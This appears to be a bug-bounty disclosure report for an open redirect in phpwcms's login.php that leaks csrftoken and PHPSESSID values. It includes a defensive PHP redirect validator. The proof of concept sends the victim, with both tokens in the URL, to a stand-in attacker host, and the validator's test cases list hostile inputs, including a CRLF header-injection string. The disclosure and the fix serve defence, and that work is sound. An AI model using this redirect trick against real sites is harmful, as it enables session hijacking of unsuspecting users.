Open Redirect in slackero/phpwcms

Status: Valid

Reported on: Aug 12th 2021


✍️ Description

Session hijacking via open redirection

🕵️‍♂️ Proof of Concept

Steps to reproduce:

1. Go to http://your-domain.tld/login.php?ref=http://attackers-domain.tld/?
2. Log in to a valid account
3. You will be redirected to http://attackers-domain.tld/?&csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy

💥 Impact

This vulnerability allows an attacker to steal the victim's csrftoken and PHPSESSID values, because login.php redirects to the unvalidated ref target and appends both tokens to the redirect URL.

When the attacker goes to http://your-domain.tld/phpwcms.php?csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy, the valid user's session will be hijacked.
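The defensive counterpart to the steps above is to treat ref as untrusted and only honour same-site, path-only targets, and to never place the session id or CSRF token in the redirect URL at all. The following is an added example written for this report; it is not phpwcms code and not the merged fix in 45171f. It assumes a hypothetical login handler that reads $_GET['ref'] and issues a Location header, and a fallback landing page of /index.php.

```php
<?php
// Added example, not phpwcms code. Validates a user-supplied "ref" redirect
// target so that only same-site, path-only destinations are followed, and
// redirects without copying any session or CSRF token into the URL.
declare(strict_types=1);

/**
 * Return $ref if it is a plain same-site path, otherwise $fallback.
 * Rejects absolute URLs (scheme present), scheme-relative URLs ("//host"),
 * the backslash variant browsers normalise to "//" ("/\host"), and any
 * control character that could be used for header injection.
 */
function safe_redirect_target(?string $ref, string $fallback = '/index.php'): string
{
    if ($ref === null || $ref === '') {
        return $fallback;
    }
    // CR, LF and other control characters have no place in a Location value.
    if (preg_match('/[\x00-\x1F\x7F]/', $ref)) {
        return $fallback;
    }
    // Must start with exactly one "/" that is not followed by "/" or "\".
    if (!preg_match('#^/(?![/\\\\])#', $ref)) {
        return $fallback;
    }
    // Belt and braces: parse_url must also see neither a scheme nor a host.
    $parts = parse_url($ref);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $fallback;
    }
    return $ref;
}

/**
 * Hypothetical post-login redirect. The session id travels only in the
 * cookie (session.use_only_cookies), the id is rotated on privilege change,
 * and the Location header carries nothing but the validated path.
 */
function redirect_after_login(?string $ref): void
{
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);
    }
    header('Location: ' . safe_redirect_target($ref), true, 303);
    exit;
}

// Self-check with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $cases = [
        '/phpwcms.php'                  => '/phpwcms.php',
        '/phpwcms.php?do=admin'         => '/phpwcms.php?do=admin',
        'http://attackers-domain.tld/?' => '/index.php',
        '//attackers-domain.tld/'       => '/index.php',
        '/\\attackers-domain.tld/'      => '/index.php',
        'javascript:alert(1)'           => '/index.php',
        "/ok?x=1\r\nSet-Cookie: a=b"    => '/index.php',
        ''                              => '/index.php',
    ];
    foreach ($cases as $in => $want) {
        $got = safe_redirect_target($in);
        printf("%-42s => %-24s %s\n", var_export($in, true), $got,
            $got === $want ? 'ok' : 'MISMATCH');
    }
}
```

The allowlist is deliberately strict (one leading slash, no scheme, no host) rather than a denylist of known-bad prefixes, because browsers normalise variants such as "/\host" and "/ /host" in ways a denylist tends to miss. Even with a validated target, the tokens must stay out of the query string: a same-site path that later embeds the session id in a link or Referer header leaks it just as effectively.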

📍 Location

login.php#L81
login.php#L243

bAu modified the report
a year ago
We have contacted a member of the slackero/phpwcms team and are waiting to hear back a year ago
slackero/phpwcms maintainer validated this vulnerability a year ago
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
slackero/phpwcms maintainer confirmed that a fix has been merged on 45171f a year ago
The fix bounty has been dropped